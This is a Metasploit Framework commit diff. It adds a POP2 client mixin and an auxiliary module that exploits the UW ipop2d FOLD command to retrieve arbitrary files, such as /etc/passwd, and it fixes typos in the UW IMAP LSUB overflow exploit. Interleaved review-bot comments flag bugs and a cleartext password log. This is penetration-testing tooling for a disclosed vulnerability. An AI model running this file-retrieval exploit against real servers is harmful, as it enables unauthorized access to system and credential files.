Added pop2 mixin, aux module, typos.

git-svn-id: file:///home/svn/framework3/trunk@5550 4d416f70-5f16-0410-b530-b9f4589650da
Patrick Webster 2008-07-08 14:21:48 +00:00
parent 4459fdd71d
commit 301b1514f3
4 changed files with 205 additions and 3 deletions


@ -236,6 +236,7 @@ class Exploit < Msf::Module
require 'msf/core/exploit/ndmp'
require 'msf/core/exploit/imap'
require 'msf/core/exploit/smtp_deliver'
require 'msf/core/exploit/pop2'
# Networks
require 'msf/core/exploit/lorcon'


@ -0,0 +1,134 @@
module Msf
require 'msf/core/exploit/tcp'
###
#
# This module exposes methods that may be useful to exploits that deal with
# servers that speak the POP2 protocol.
#
###
module Exploit::Remote::Pop2
include Exploit::Remote::Tcp
#
# Creates an instance of an POP2 exploit module.
#
def initialize(info = {})
super
# Register the options that all POP2 exploits may make use of.
register_options(
[
Opt::RHOST,
Opt::RPORT(109),
OptString.new('POP2USER', [ false, 'The username to authenticate as']),
OptString.new('POP2PASS', [ false, 'The password for the specified username'])
], Msf::Exploit::Remote::Pop2)
end
#
# This method establishes a POP2 connection to host and port specified by
# the RHOST and RPORT options, respectively. After connecting, the banner
# message is read in and stored in the 'banner' attribute.
#
def connect(global = true)
print_status("Connecting to POP2 server #{rhost}:#{rport}...")
fd = super
# Wait for a banner to arrive...
self.banner = fd.get_once
print_status("Connected to target POP2 server.")
print_status("Banner: #{self.banner.split("\n")[0].strip}")
# Return the file descriptor to the caller
fd
end
#
# Connect and login to the remote POP2 server using the credentials
# that have been supplied in the exploit options.
#
def connect_login(global = true)
pop2sock = connect(global)
if (not (user and pass))
print_status("No username and password were supplied, unable to login")
return false
end
print_status("Authenticating as #{user} with password #{pass}...")
res = raw_send_recv("HELO #{user} #{pass}\r\n")
if (res !~ /messages/)
print_status("Authentication failed")
return false
end
print_status("Messages: #{res}")
return true
end
#
# This method transmits a POP2 command and waits for a response. If one is
# received, it is returned to the caller.
#
def raw_send_recv(cmd, nsock = self.sock)
nsock.put(cmd)
res = nsock.get_once
end
#
# This method sends one command with zero or more parameters
#
def send_cmd(args, recv = true, nsock = self.sock)
cmd = args.join(" ") + "\r\n"
if (recv)
return raw_send_recv(cmd, nsock)
else
return raw_send(cmd, nsock)
end
end
#
# This method transmits a FTP command and does not wait for a response
#
def raw_send(cmd, nsock = self.sock)
nsock.put(cmd)
end
##
#
# Wrappers for getters
#
##
#
# Returns the user string from the 'POP2USER' option.
#
def user
datastore['POP2USER']
end
#
# Returns the user string from the 'POP2PASS' option.
#
def pass
datastore['POP2PASS']
end
protected
#
# This attribute holds the banner that was read in after a successful call
# to connect or connect_login.
#
attr_accessor :banner
end
end
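Review bot: `connect` dereferences the banner without checking it: if `fd.get_once` returns nil (which it appears to do when nothing arrives before the timeout) or an empty string, `self.banner.split("\n")[0].strip` raises NoMethodError and the module aborts with a stack trace instead of a status line; something like `print_status("Banner: #{self.banner.to_s.split("\n")[0].to_s.strip}")` avoids that. `connect_login` also echoes POP2PASS in clear with `print_status("Authenticating as #{user} with password #{pass}...")`, so the credential lands in console logs and spool files; `print_status("Authenticating as #{user}...")` is enough. The comments above `raw_send` ("a FTP command") and `pass` ("Returns the user string") are copy-paste leftovers and should read "a POP2 command" and "Returns the password string".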


@ -0,0 +1,67 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Auxiliary::Admin::Pop2::Uw_FileRetrieval < Msf::Auxiliary
include Exploit::Remote::Pop2
def initialize(info = {})
super(update_info(info,
'Name' => 'UoW pop2d Remote File Retrieval Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the FOLD command of the
University of Washington ipop2d service. By specifying an arbitrary
folder name it is possible to retrieve any file which is world or group
readable by the user ID of the POP account. This vulnerability can only
be exploited with a valid username and password. The From address is
the file owner.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '368' ],
[ 'BID', '1484' ],
],
'DisclosureDate' => 'Jul 14 2000'))
register_options(
[
OptString.new('FILE', [ true, "The file to retrieve", '/etc/passwd' ])
], self.class)
end
def run
connect_login
file = datastore['FILE']
res = send_cmd( ['FOLD', file] , true)
if (res =~ /#1 messages in/)
send_cmd( ['READ 1'] , true)
file_output = send_cmd( ['RETR'] , true)
print_status("File output:\r\n\r\n#{file_output}\r\n")
send_cmd( ['ACKS'] , true)
elsif (res =~ /#0 messages in/)
print_status("File #{file} not found or read-access is denied.")
end
send_cmd( ['QUIT'] , true)
disconnect
end
end
end
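Review bot: `run` discards the return value of `connect_login`, which returns false both when no credentials are set and when the HELO reply lacks "messages", so FOLD, READ and RETR are still sent on a session that never authenticated and the operator sees either a misleading "not found" line or nothing at all. Check the result first and stop after closing the socket, e.g. `unless connect_login` followed by `disconnect` and `return`. A nil or unexpected FOLD reply matches neither `=~` branch, so the run ends silently; an `else` branch with `print_status("Unexpected response: #{res.inspect}")` would make that case visible. Wrapping the exchange in `begin` / `ensure disconnect` would also keep the connection from leaking if any `send_cmd` raises.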


@ -14,7 +14,7 @@ require 'msf/core'
module Msf
class Exploits::Linux::Imap::Imap_UW_LSub < Msf::Exploit::Remote
class Exploits::Linux::Imap::Imap_UW_LSub < Msf::Exploit::Remote
include Exploit::Remote::Imap
@ -23,7 +23,7 @@ module Msf
'Name' => 'UoW IMAP server LSUB Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'LSUB'
command of the the University of Washington IMAP service.
command of the University of Washington IMAP service.
This vulnerability can only be exploited with a valid username
and password.
},
@ -72,7 +72,7 @@ module Msf
connect_login
print_status("Sending overflow string...")
req = "a001 LSUB \"\" {1064}\r\n"
req = "a002 LSUB \"\" {1064}\r\n"
sock.put(req)
sleep(2)